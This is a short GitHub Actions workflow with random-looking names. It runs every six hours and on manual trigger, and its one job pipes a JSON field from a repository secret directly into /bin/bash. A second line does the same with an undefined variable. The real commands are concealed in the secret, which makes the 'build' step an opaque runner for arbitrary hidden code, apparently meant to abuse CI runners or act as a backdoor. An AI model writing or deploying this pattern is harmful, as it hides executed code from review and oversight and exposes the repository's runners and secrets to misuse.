name: operatingbiking

on:
  workflow_dispatch:
  schedule:
    - cron: '49 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: operatingbiking
        env:
          nnanl3: ${{ secrets.nnanl3 }}
        run: |
          echo $nnanl3 | jq -r .hsj82 | /bin/bash
          echo $tzx21009 | jq -r .imnbx68385 | /bin/bash

